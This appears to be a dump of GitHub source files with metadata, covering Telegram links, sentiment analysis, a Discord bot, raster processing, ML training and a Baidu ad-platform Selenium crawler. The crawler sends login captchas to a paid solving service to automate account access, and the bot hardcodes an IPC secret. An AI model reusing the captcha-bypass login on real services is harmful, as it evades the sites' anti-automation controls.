str:\n admin_value = \"+\".join(admin_rights)\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"startchannel\": NOT_SET,\n \"admin\": admin_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"startchannel\": NOT_SET,\n \"admin\": admin_value\n }\n )\n\n\ndef get_game_link(username: str, name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"game\": name\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"game\": name\n }\n )\n\n\ndef get_user_link(id_: int) -> str:\n return _get_parametrized_link(\n \"tg://user\",\n parameters={\n \"id\": id_\n }\n )\n\n\ndef _get_parametrized_link(uri: str, parameters: dict[str, Any]) -> str:\n value_parameters = {}\n no_value_parameters = []\n\n for name, value in parameters.items():\n if value is NOT_SET:\n no_value_parameters.append(name)\n elif value is not None:\n value_parameters[name] = value\n\n link = uri\n\n if value_parameters or no_value_parameters:\n link += \"?\"\n\n if value_parameters:\n link += urlencode(value_parameters, encoding=\"UTF-8\")\n\n if no_value_parameters:\n link += \"&\" + \"&\".join(no_value_parameters)\n elif no_value_parameters:\n link += \"&\".join(no_value_parameters)\n\n return link\n","repo_name":"Abstract-X/telebox","sub_path":"telebox/bot/utils/deep_links.py","file_name":"deep_links.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"6134079633","text":"from flask import Flask, request\nfrom pymongo import MongoClient\nfrom errorHandler import jsonErrorHandler\nfrom bson import json_util, ObjectId\nfrom check import listMessages, listMessagesUser, listAllUsers, changeId\nimport json\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport pandas as pd\nfrom scipy.spatial.distance import pdist, squareform\n\n#Connect to DB\nclient = MongoClient(\"mongodb://localhost:27017\")\nmydb = client[\"sentiment\"]\n\n#NLTK\nnltk.download('vader_lexicon')\nsia = SentimentIntensityAnalyzer()\n\n\ndef analyzeResult(chat_id):\n 
#Analyze the sentiment of each chat message independently\n all_messages = listMessages(chat_id)\n result_analyze = []\n for i in all_messages:\n score = sia.polarity_scores(i['text'])\n result_analyze.append((i['user_id']['$oid'],score))\n return result_analyze\n\n\ndef analyzeAllResult(chat_id):\n #Analyze the sentiment of all chat messages\n all_messages = listMessages(chat_id)\n total_score = {'id': chat_id,'neg': 0.0, 'neu': 0.0, 'pos': 0.0}\n for i in all_messages:\n score = sia.polarity_scores(i['text'])\n total_score['neg'] += score['neg']\n total_score['pos'] += score['pos']\n total_score['neu'] += score['neu']\n return total_score\n\n\ndef analyzeResultUser(chat_id, user_id):\n #Analyze the sentiment of all chat messages for especific user\n all_messages = listMessagesUser(chat_id, user_id)\n total_score = {'user_id': user_id, \"chat_id\": chat_id, 'neg': 0.0, 'neu': 0.0, 'pos': 0.0}\n for i in all_messages:\n score = sia.polarity_scores(i['text'])\n total_score['neg'] += score['neg']\n total_score['pos'] += score['pos']\n total_score['neu'] += score['neu']\n return total_score\n\n\ndef analyzeUsers(chat_id):\n #Analyze the sentiment for all users in a chat\n all_users = listAllUsers(chat_id)\n all_scores = []\n for i in all_users:\n for j in i['users_ids']:\n score = analyzeResultUser(chat_id, j['$oid'])\n all_scores.append(score)\n return all_scores\n\n\ndef analyzeRecommendUsers(user_id, chat_id):\n #Analyze the sentiment for all users in a chat and return 3 user recommendation\n scores = analyzeUsers(chat_id)\n df = pd.DataFrame(scores).set_index('user_id')\n df = df.drop(columns =['chat_id'])\n df = pd.pivot_table(df, index='user_id')\n distances = pd.DataFrame(1/(1 + squareform(pdist(df, 'euclidean'))), \n index=df.index, columns=df.index)\n for _ in distances:\n similarities = distances[user_id].sort_values(ascending=False)[1:4]\n recommend = list(similarities.index)\n recommend = json.loads(json_util.dumps(recommend))\n recommend = changeId(recommend)\n return recommend\n","repo_name":"IvanDGregor/Sentiment-Analysis","sub_path":"src/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14478787816","text":"\"\"\"\nThis is the code for the bot.\nEdit the file for adding more commands/customizing the bot.\n\"\"\"\n\nimport os\nimport nextcord\nfrom nextcord.ext import commands, ipc\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass BotClass(commands.Bot):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.ipc_server = ipc.Server(self, secret_key=\"Hercules\")\n\n async def on_ready(self):\n \"\"\"Called upon the bot is ready to use\"\"\"\n print(\"Bot is ready\")\n\n async def on_ipc_ready(self):\n \"\"\"Called upon the ipc server is ready to use\"\"\"\n print(\"The ipc server is ready\")\n\n async def on_ipc_error(self, endpoint, error):\n \"\"\"Called upon the endpoint raises an error\"\"\"\n print(f\"{error} was raised by {endpoint}\")\n\n# if you use slash commands then change whatever needed, don't remove anything except the command prefix\nbot = BotClass(command_prefix=\"!\", intents=nextcord.Intents.all())\n\n@bot.ipc_server.route()\nasync def get_guild_count(data):\n guild_count = len(bot.guilds)\n return guild_count\n\n@bot.ipc_server.route()\nasync def get_guild_ids(data):\n guild_ids = [int(guild.id) for guild in bot.guilds]\n return guild_ids\n\n@bot.command()\nasync def test(ctx):\n \"\"\"\n 
This command is not necessary, you can remove this command and \n add whatever command you need.\n \"\"\"\n await ctx.reply(\"Everything is working perfectly\")\n\nif __name__ == \"__main__\":\n bot.ipc_server.start()\n bot.run(os.getenv(\"BOT_TOKEN\"))","repo_name":"D34ThGamer/XyRic_Bot_Dashboard","sub_path":"XyRic Bot Dashboard/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9335298091","text":"# 栅格分级赋色处理用于展示\r\nimport os\r\nimport numpy as np\r\nimport rasterio\r\nfrom rasterio.warp import calculate_default_transform, reproject, Resampling\r\n\r\n\r\ndef reclass_coloring(src_path, dst_path, reform_dic):\r\n with rasterio.open(src_path) as src:\r\n src_arr = src.read(1)\r\n meta = src.meta\r\n threshold = reform_dic['threshold']\r\n dst_value = reform_dic['dst_value']\r\n color_map = reform_dic['color_map']\r\n # reclass\r\n if len(threshold) != len(dst_value):\r\n print('the input out_value do not match threshold!')\r\n return\r\n dst_arr = src_arr.copy()\r\n for i in range(len(threshold)):\r\n if i != (len(threshold) - 1):\r\n dst_arr[(src_arr > threshold[i]) & (src_arr <= threshold[i + 1])] = dst_value[i]\r\n else:\r\n dst_arr[src_arr > threshold[i]] = dst_value[i]\r\n # coloring\r\n dst_arr[np.isnan(dst_arr)] = 0\r\n meta.update({'nodata': 0})\r\n meta.update({'dtype': 'uint8'})\r\n with rasterio.open(dst_path, 'w', **meta) as dst:\r\n dst_arr = dst_arr.astype('uint8')\r\n dst.write(dst_arr, indexes=1)\r\n dst.write_colormap(1, color_map)\r\n\r\n\r\ndef reproject2wgs84(src_path, dst_path):\r\n dataset = rasterio.open(src_path)\r\n dataread = dataset.read()\r\n dataread = dataread.astype('uint8')\r\n dst_crs = 'EPSG:4326'\r\n transform, width, height = calculate_default_transform(\r\n dataset.crs, dst_crs, dataset.width, dataset.height, *dataset.bounds)\r\n kwargs = dataset.profile.copy()\r\n kwargs.update({\r\n 'crs': dst_crs,\r\n 'transform': transform,\r\n 'width': width,\r\n 'height': height,\r\n 'dtype': rasterio.uint8,\r\n })\r\n with rasterio.open(dst_path, 'w', **kwargs) as dst:\r\n for i in range(1, dataset.count + 1):\r\n reproject(\r\n source=dataread[i - 1],\r\n destination=rasterio.band(dst, i),\r\n src_transform=dataset.transform,\r\n src_crs=dataset.crs,\r\n dst_transform=transform,\r\n dst_crs=dst_crs,\r\n resampling=Resampling.nearest)\r\n\r\n\r\nif __name__ == '__main__':\r\n # src_file = 'G:/VScodeProjects/air_pollution_surveillance/raster_process_for_display/air_pollution_pm2p5.tif'\r\n # reprojected_file = src_file.split('.')[0] + '_reprojected.tif'\r\n # dst_file = reprojected_file.split('.')[0] + '_color.tif'\r\n # reform_dic = {'threshold': [0, 35, 75, 115, 150, 250],\r\n # 'dst_value': [1, 2, 3, 4, 5, 6],\r\n # 'color_map': {\r\n # 1: (8, 8, 255),\r\n # 2: (59, 157, 255),\r\n # 3: (112, 255, 210),\r\n # 4: (231, 255, 74),\r\n # 5: (255, 166, 0),\r\n # 6: (255, 0, 0)}}\r\n # reproject2wgs84(src_file, reprojected_file)\r\n # reclass_coloring(reprojected_file, dst_file, reform_dic)\r\n\r\n # 以下代码为下载的H8pm2.5tif数据分级赋色\r\n # input_dir = 'F:/zsk/H8/demo/output/l4/China'\r\n # output_dir = 'F:/zsk/H8/demo/output/l4/China_color/color_2'\r\n\r\n # for d in os.listdir(input_dir):\r\n # d_dir = os.path.join(input_dir, d)\r\n # out_d_dir = os.path.join(output_dir, d)\r\n # if not os.path.exists(out_d_dir):\r\n # os.mkdir(out_d_dir)\r\n # for src_file in os.listdir(d_dir):\r\n # reprojected_name = src_file.split('.')[0] + 
'_reprojected.tif'\r\n # dst_name = reprojected_name.split('.')[0] + '_color.tif'\r\n # reprojected_file = os.path.join(out_d_dir, reprojected_name)\r\n # dst_file = os.path.join(out_d_dir, dst_name)\r\n # reform_dic = {'threshold': [0, 35, 75, 115, 150, 250],\r\n # 'dst_value': [1, 2, 3, 4, 5, 6],\r\n # 'color_map': {\r\n # 1: (0, 97, 0),\r\n # 2: (97, 153, 0),\r\n # 3: (197, 219, 0),\r\n # 4: (255, 217, 0),\r\n # 5: (255, 132, 0),\r\n # 6: (255, 38, 0)}}\r\n # src_file_path = os.path.join(d_dir, src_file)\r\n # # reproject2wgs84(src_file_path, reprojected_file)\r\n # reclass_coloring(src_file_path, dst_file, reform_dic)\r\n\r\n db_tif_dir = 'F:/zsk/H8/demo/db/black_tif'\r\n output_dir = 'F:/zsk/H8/demo/db/color_tif/color_2'\r\n\r\n for day in os.listdir(db_tif_dir):\r\n day_dir = os.path.join(db_tif_dir, day)\r\n out_day_dir = os.path.join(output_dir, day)\r\n if not os.path.exists(out_day_dir):\r\n os.mkdir(out_day_dir)\r\n for f in os.listdir(day_dir):\r\n if f.endswith('.tif'):\r\n reprojected_file_name = f.split('.')[0] + '_reprojected.tif'\r\n dst_file_name = reprojected_file_name.split('.')[0] + '_color.tif'\r\n reform_dic = {'threshold': [0, 35, 75, 115, 150, 250],\r\n 'dst_value': [1, 2, 3, 4, 5, 6],\r\n 'color_map': {\r\n # 1: (40, 146, 199),\r\n # 2: (140, 184, 164),\r\n # 3: (215, 227, 125),\r\n # 4: (252, 207, 81),\r\n # 5: (247, 122, 45),\r\n # 6: (232, 21, 21)}}\r\n # 1: (0, 97, 0),\r\n 1: (0, 97, 0),\r\n 2: (97, 153, 0),\r\n 3: (197, 219, 0),\r\n 4: (255, 217, 0),\r\n 5: (255, 132, 0),\r\n 6: (255, 38, 0)}}\r\n src_file = os.path.join(day_dir, f)\r\n reprojected_file = os.path.join(out_day_dir, reprojected_file_name)\r\n dst_file = os.path.join(out_day_dir, dst_file_name)\r\n reproject2wgs84(src_file, reprojected_file)\r\n reclass_coloring(reprojected_file, dst_file, reform_dic)\r\n os.remove(reprojected_file)\r\n\r\n","repo_name":"ValarMorghulis12138/air_pollution_surveillance","sub_path":"raster_process_for_display/raster_process_for_dsiplay.py","file_name":"raster_process_for_dsiplay.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2908301763","text":"import json\nimport os\n\nimport torch\nfrom torch_geometric.data import Data, InMemoryDataset\nfrom torch_geometric.io import read_txt_array\nfrom torch_geometric.utils import sort_edge_index\n\n\nclass DBP15K(InMemoryDataset):\n def __init__(self, root, pair, KG_num=1, rate=0.3, seed=1):\n self.pair = pair\n self.KG_num = KG_num\n self.rate = rate\n self.seed = seed\n torch.manual_seed(seed)\n super(DBP15K, self).__init__(root)\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n @property\n def raw_file_names(self):\n return ['zh_en', 'fr_en', 'ja_en']\n\n @property\n def processed_file_names(self):\n return '%s_%d_%.1f_%d.pt' % (self.pair, self.KG_num, self.rate, self.seed)\n\n def process(self):\n x1_path = os.path.join(self.root, self.pair, 'ent_ids_1')\n x2_path = os.path.join(self.root, self.pair, 'ent_ids_2')\n g1_path = os.path.join(self.root, self.pair, 'triples_1')\n g2_path = os.path.join(self.root, self.pair, 'triples_2')\n emb_path = os.path.join(self.root, self.pair, self.pair[:2] + '_vectorList.json')\n x1, edge_index1, rel1, assoc1 = self.process_graph(g1_path, x1_path, emb_path)\n x2, edge_index2, rel2, assoc2 = self.process_graph(g2_path, x2_path, emb_path)\n\n pair_path = os.path.join(self.root, self.pair, 'ref_ent_ids')\n pair_set = self.process_pair(pair_path, assoc1, assoc2)\n# 
pair_set = pair_set[:, torch.randperm(pair_set.size(1))]\n train_set = pair_set[:, :int(self.rate * pair_set.size(1))]\n test_set = pair_set[:, int(self.rate * pair_set.size(1)):]\n\n if self.KG_num == 1:\n data = Data(x1=x1, edge_index1=edge_index1, rel1=rel1,\n x2=x2, edge_index2=edge_index2, rel2=rel2,\n train_set=train_set.t(), test_set=test_set.t())\n else:\n x = torch.cat([x1, x2], dim=0)\n edge_index = torch.cat([edge_index1, edge_index2 + x1.size(0)], dim=1)\n rel = torch.cat([rel1, rel2 + rel1.max() + 1], dim=0)\n data = Data(x=x, edge_index=edge_index, rel=rel, train_set=train_set.t(), test_set=test_set.t())\n torch.save(self.collate([data]), self.processed_paths[0])\n\n def process_graph(self, triple_path, ent_path, emb_path):\n g = read_txt_array(triple_path, sep='\\t', dtype=torch.long)\n subj, rel, obj = g.t()\n\n assoc = torch.full((rel.max().item() + 1,), -1, dtype=torch.long)\n assoc[rel.unique()] = torch.arange(rel.unique().size(0))\n rel = assoc[rel]\n\n idx = []\n with open(ent_path, 'r') as f:\n for line in f:\n info = line.strip().split('\\t')\n idx.append(int(info[0]))\n idx = torch.tensor(idx)\n with open(emb_path, 'r', encoding='utf-8') as f:\n embedding_list = torch.tensor(json.load(f))\n x = embedding_list[idx]\n\n assoc = torch.full((idx.max().item() + 1,), -1, dtype=torch.long)\n assoc[idx] = torch.arange(idx.size(0))\n subj, obj = assoc[subj], assoc[obj] # map to [0, max_entity_count)\n edge_index = torch.stack([subj, obj], dim=0)\n edge_index, rel = sort_edge_index(edge_index, rel)\n print(edge_index.shape, rel.shape)\n return x, edge_index, rel, assoc\n\n def process_pair(self, path, assoc1, assoc2):\n e1, e2 = read_txt_array(path, sep='\\t', dtype=torch.long).t()\n return torch.stack([assoc1[e1], assoc2[e2]], dim=0)\n","repo_name":"LinXueyuanStdio/BGEA","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26142374950","text":"class Solution:\n def stoneGameVII(self, stones: List[int]) -> int:\n n = len(stones)\n memo = [[-inf]*n for _ in range(n)]\n presum = [0] + list(accumulate(stones))\n \n @lru_cache(None)\n def dfs(l, r):\n if l > r: return 0\n if memo[l][r] != -inf: return memo[l][r]\n\n # alice = (presum[r+1]-presum[l+1]) - dfs(l+1, r)\n memo[l][r] = (presum[r+1]-presum[l+1]) - dfs(l+1, r)\n # alice = max(alice, presum[r]-presum[l] - dfs(l, r-1))\n memo[l][r] = max(memo[l][r], presum[r]-presum[l] - dfs(l, r-1))\n\n return memo[l][r]\n return dfs(0, len(stones)-1)\n\nclass Solution:\n def stoneGameVII(self, stones: List[int]) -> int:\n n = len(stones)\n\n # presum = [0]*(n+1)\n # for i in range(1, n+1):\n # presum[i] = presum[i-1] + stones[i-1]\n presum = [0] + list(accumulate(stones))\n\n # dp[i][j]: the maximum difference when playing in stones[i:j]\n dp = [[-inf]*n for _ in range(n)]\n\n # n starts from 2 to 1000 at most\n # length = 2\n for i in range(n-1):\n dp[i][i+1] = max(stones[i], stones[i+1])\n\n for length in range(3, n+1):\n for i in range(n-length+1):\n j = i+length-1\n # remove i (leftmost)\n dp[i][j] = presum[j+1]-presum[i+1] - dp[i+1][j]\n \n # remove j (rightmost)\n dp[i][j] = max(dp[i][j], presum[j]-presum[i] - dp[i][j-1])\n return dp[0][n-1]\n","repo_name":"Vergil0327/leetcode-history","sub_path":"2-D Dynamic Programming/Interval/1690. 
Stone Game VII/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10624208988","text":"\n\nimport tensorflow as tf\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\n\ndata = pd.read_csv(\"Dataset_Final.csv\").set_index('DATE')\ndata.info()\n\n\n\n\ntarget = \"COND\"\nfeatures = [\"TEMP\",\"DEWP\",\"SLP\",\"VISIB\",\"WDSP\",\"PRCP\"]\n\ntrain, test = train_test_split(data, test_size=0.1)\n\nX_train = train[features]\ny_train = train[target]\nX_test = test[features]\ny_test = test[target]\n\nprint(\"Dimensions of the training set : {0}\".format(np.shape(X_train)))\nprint(\"Dimensions of the training set (target) : {0}\".format(np.shape(y_train.values.reshape(len(y_train),1))))\n\n\n# In[4]:\n\n\ndef model(hu, model_dir, features):\n feature_columns = [tf.feature_column.numeric_column(\"x\", shape=[len(features),1])]\n\n classifier = tf.estimator.DNNClassifier(feature_columns=feature_columns,\n hidden_units=hu,\n n_classes=3, \n model_dir=model_dir)\n # Define the training inputs\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": np.array(X_train)},\n y=np.array(y_train.values.reshape((len(y_train),1))),\n num_epochs=None,\n shuffle=True,\n batch_size=8000)\n return classifier, train_input_fn\n\n\nclassifier, train_input_fn = model([50,50,50,50,50], \"./DNN\", features)\nclassifier.train(input_fn=train_input_fn, steps=40000)\n\n\ndef testinput(X_test, y_test):\n test_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": np.array(X_test)},\n y=np.array(y_test),\n num_epochs=1,\n shuffle=False)\n return test_input_fn\n\n\n# Evaluate accuracy.\naccuracy_score = classifier.evaluate(input_fn=testinput(X_test,y_test))[\"accuracy\"]\nprint(\"\\nTest Accuracy: {0:f}\\n\".format(accuracy_score))\nmy_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": np.array(X_test[features])},\n y=None,\n num_epochs=1,\n shuffle=False)\npred = classifier.predict(input_fn=my_input_fn)\n\n\n\npredictions = list(pred)\npredictions[0]\nprint (predictions[0])\n\n\n\n\nfinal_pred = np.array([])\nfor p in predictions:\n final_pred = np.append(final_pred,p['class_ids'][0])\nfinal_pred = final_pred.astype(int)\n","repo_name":"arnnav/Weather-Forecasting","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1825232446","text":"import os\nimport boto3\nfrom botocore.config import Config\nfrom pq_converter import LambdaProcessor\n\nendpoint = os.environ[\"ENDPOINT\"]\nendpoint_url = os.environ[\"ENDPOINT_URL\"]\n\n# boto3 session\nsession = boto3.Session()\n\nif endpoint == \"localstack\":\n print(\"Start Testing with Localstack\")\n s3 = session.resource(\"s3\", endpoint_url=endpoint_url, config=Config())\nelse:\n s3 = session.resource(\"s3\")\n\n\ndef lambda_handler(event, context) -> dict:\n processor = LambdaProcessor(event=event, context=context, s3=s3)\n return processor.main()","repo_name":"tosh2230/tf-serverless","sub_path":"aws/src/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71166518727","text":"'''\nScript to train the dense saliency model\n\n@author: Hamed R. 
Tavakoli\n'''\nimport re\nimport os\nimport sys\nimport shutil\n\n\nimport torch\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nfrom database import SalDB\nfrom deepsalmodelRes import DeepSal\n\n\nfrom lossfunctions import KLLoss, NEGNSSLoss, ACCLoss\n\ndevice = torch.device(torch.cuda.current_device() if torch.cuda.is_available() else \"cpu\")\ntorch.device(device)\n\n\nlearning_rate = 1e-8\n\nheight_dim = 256\nwidth_dim = 320\nts = (64, 80)\n\n\nclass TrainSal(object):\n\n def __init__(self, batch_size, num_workers, root_folder):\n super(TrainSal, self).__init__()\n\n self.model = DeepSal().to(device)\n self.model.train()\n\n self.val_loss = 0.0\n\n self.batch_size = batch_size\n self.num_workers = num_workers\n transform_1 = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])])\n\n transform_target = transforms.Compose([transforms.Grayscale(1),\n transforms.ToTensor()])\n\n self.train_db = SalDB(root_folder=root_folder, input_size=(height_dim, width_dim),\n output_size=ts, fold='train',\n input_transform=transform_1,\n target_transform=transform_target)\n self.valid_db = SalDB(root_folder=root_folder, input_size=(height_dim, width_dim),\n output_size=ts, fold='val',\n input_transform=transform_1,\n target_transform=transform_target)\n\n parameters = self.model.parameters()\n self.optimizer = optim.Adam(parameters, lr=learning_rate,\n weight_decay=0.0001)\n self.scheduler = optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, factor=0.1, patience=1,\n verbose=True)\n\n self.criterion_nss = NEGNSSLoss().to(device)\n self.criterion_kld = KLLoss().to(device)\n self.criterion_acc = ACCLoss().to(device)\n\n def _disable_main_trunk_params(self):\n for param in self.model.encode_image.parameters():\n param.requires_grad = False\n\n def load_checkpoint(self, model_path):\n # support densenet and pytorch 0.4 added\n if os.path.isfile(model_path):\n print(\"=> loading checkpoint '{}'\".format(model_path))\n checkpoint = torch.load(model_path)\n\n # '.'s are no longer allowed in module names, but pervious _DenseLayer\n # has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.\n # They are also in the checkpoints in model_urls. 
This pattern is used\n # to find such keys.\n pattern = re.compile(r'^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.(?:weight|bias|running_mean|running_var))$')\n state_dict = checkpoint['state_dict']\n for key in list(state_dict.keys()):\n res = pattern.match(key)\n if res:\n new_key = res.group(1) + res.group(2)\n state_dict[new_key] = state_dict[key]\n del state_dict[key]\n\n self.model.load_state_dict(state_dict=state_dict, strict=False)\n print(\"=> loaded checkpoint '{}' )\".format(model_path))\n else:\n print(\"=> no checkpoint found at '{}'\".format(model_path))\n\n def save_checkpoint(self, is_best, filename='checkpoint_{}x{}.pth.tar'.format(height_dim, width_dim), prefix=''):\n\n state = {'state_dict': self.model.state_dict(),\n 'optimizero': self.optimizer}\n torch.save(state, prefix + filename)\n if is_best:\n shutil.copyfile(prefix + filename, prefix + 'model_best_{}x{}.pth.tar'.format(height_dim, width_dim))\n\n def train_val_loop(self, epoch, fold):\n\n if fold == 'val':\n dbl = torch.utils.data.DataLoader(self.valid_db, batch_size=self.batch_size,\n shuffle=False, num_workers=self.num_workers)\n self.model.eval()\n torch.set_grad_enabled(False)\n if fold == 'train':\n dbl = torch.utils.data.DataLoader(self.train_db, batch_size=self.batch_size,\n shuffle=True, num_workers=self.num_workers)\n self.model.train()\n torch.set_grad_enabled(True)\n\n running_loss = 0.0\n\n data_iterator = iter(dbl)\n\n for it in range(len(dbl)):\n\n img_id, img, map, fix = data_iterator.next()\n img = img.to(device)\n map = map.to(device)\n fix = fix.to(device)\n\n saloutput = self.model(img)\n loss1 = self.criterion_nss(saloutput, fix)\n loss2 = self.criterion_kld(saloutput, map)\n loss3 = self.criterion_acc(saloutput, map)\n loss = 7*loss1 + loss2 + 2*loss3\n\n if torch.isnan(loss):\n print('\\nerror\\n')\n if fold == 'train':\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n running_loss += loss.item()\n\n sys.stdout.write(\"\\rEpoch %d -- %s %.01f%% -- Loss: %.03f\" %\n (epoch+1, fold, (it + 1) / len(dbl) * 100, running_loss / ((it + 1)*self.batch_size)))\n sys.stdout.flush()\n\n sys.stdout.write(\" \\n \")\n sys.stdout.flush()\n if fold == 'val':\n self.val_loss = running_loss / (it + 1)\n\n def train_val_model(self, num_epochs, log_dir, model_path=None):\n\n if model_path is not None:\n self.load_checkpoint(model_path)\n\n loss_value = 0\n for epoch in range(num_epochs):\n self.train_val_loop(epoch, 'train')\n self.train_val_loop(epoch, 'val')\n self.scheduler.step(self.val_loss)\n is_best = False\n if epoch > 0:\n if self.val_loss <= loss_value:\n loss_value = self.val_loss\n is_best = True\n else:\n loss_value = self.val_loss\n is_best = True\n self.save_checkpoint(is_best, prefix=log_dir)\n\n\nif __name__ == \"__main__\":\n\n folder = '/mnt/Databases/websal/data/'\n model_trainer = TrainSal(batch_size=4, num_workers=2, root_folder=folder)\n model_trainer.train_val_model(20, './web_model/', './log_res50/model_best_256x320.pth.tar')","repo_name":"hrtavakoli/WebSal","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"33133631249","text":"from selenium import webdriver\r\nimport logging\r\nimport time\r\nimport json\r\nimport os\r\n\r\nfrom platform_crawler.spiders.pylib.post_res import post_res\r\nfrom platform_crawler.utils.utils import Util\r\nfrom platform_crawler.utils.post_get import post\r\nfrom 
platform_crawler.settings import IMG_PATH, join\r\n\r\n\r\nu = Util()\r\nlogger = None\r\n\r\n\r\nclass BaiDuPhone:\r\n\r\n def __init__(self, user_info, log_name):\r\n global logger\r\n self.d = None\r\n self.acc= user_info.get('account')\r\n self.pwd = user_info.get('password')\r\n self.user_info = user_info\r\n logger = logging.getLogger(log_name)\r\n\r\n def init_driver(self):\r\n driver = webdriver.Chrome()\r\n driver.set_page_load_timeout(60)\r\n driver.set_script_timeout(30)\r\n driver.maximize_window()\r\n return driver\r\n\r\n def get(self, url):\r\n try:\r\n self.d.delete_all_cookies()\r\n self.d.get(url)\r\n except: # 超时重试一次\r\n self.d.delete_all_cookies()\r\n self.d.get(url)\r\n time.sleep(3)\r\n\r\n def deal_vc(self):\r\n # 裁剪\r\n element = self.d.find_element_by_id('img-captcha')\r\n img_path = join(IMG_PATH, 'vc.png')\r\n u.cutimg_by_driver(self.d, element, img_path)\r\n with open(img_path, 'br') as i:\r\n img = i.read()\r\n\r\n vc_res = u.rc.rk_create(img, 3040)\r\n vc = vc_res.get('Result').lower()\r\n # 验证\r\n self.d.find_element_by_name('entered_imagecode').send_keys(vc)\r\n self.d.find_element_by_id('btn-login').click()\r\n time.sleep(2)\r\n check_cookie = self.d.get_cookies()\r\n res = self.is_login(check_cookie)\r\n if not res.get('succ'):\r\n login_res = self.d.find_element_by_xpath('//div[@class=\"mod-login-inner\"]//span').text\r\n if login_res == '验证码错误':\r\n u.rc.rk_report_error(vc_res.get('Id'))\r\n return {'succ': False, 'msg': 'vc'}\r\n elif login_res == '用户名密码错误':\r\n return {'succ': False, 'msg': 'pd'}\r\n u.rc.rk_report(img, 3040, vc, vc_type=self.user_info.get('platform'))\r\n return {'succ': True}\r\n\r\n def is_login(self, cookie):\r\n param = int(time.time()*1000)\r\n url = 'http://baitong.baidu.com/request.ajax?path=appads/GET/basicinfo&reqid=%s_0' % param\r\n cookie = '; '.join(['%s=%s' % (e.get('name'), e.get('value')) for e in cookie])\r\n headers = {\r\n 'Accept': \"*/*\",\r\n 'Content-Type': \"application/x-www-form-urlencoded\",\r\n 'Cookie': cookie,\r\n 'Host': \"baitong.baidu.com\",\r\n 'Origin': \"http://baitong.baidu.com\",\r\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\r\n }\r\n data = {\r\n 'path': 'appads/GET/basicinfo',\r\n 'params': {},\r\n 'eventId': '%s_0' % param\r\n }\r\n res = post(url, data=json.dumps(data), headers=headers)\r\n if not res.get('is_success'): # 网络异常\r\n return {'succ': False, 'msg': res.get('msg')}\r\n data = json.loads(res.get('msg').content)\r\n # logger.info(data)\r\n if data.get('status') != 200: # 登陆失败,两个key: retdesc, retcode\r\n return {'succ': False, 'msg': 'login failed'}\r\n else:\r\n return {'succ': True, 'msg': 'login success'}\r\n\r\n def login(self, retrytimes=0):\r\n url = 'https://baitong.baidu.com'\r\n try:\r\n self.get(url)\r\n self.d.find_element_by_class_name('to-login').click()\r\n time.sleep(1)\r\n self.d.find_element_by_name('entered_login').clear()\r\n self.d.find_element_by_name('entered_login').send_keys(self.acc)\r\n self.d.find_element_by_name('entered_password').clear()\r\n self.d.find_element_by_name('entered_password').send_keys(self.pwd)\r\n login_res = self.deal_vc() # 处理验证码和判断登陆结果\r\n if not login_res.get('succ') and login_res.get('msg') == 'vc':\r\n time.sleep(1)\r\n return self.login(retrytimes=retrytimes)\r\n elif not login_res.get('succ') and login_res.get('msg') == 'pd':\r\n if retrytimes == 5:\r\n return login_res\r\n retrytimes += 1\r\n time.sleep(1)\r\n return 
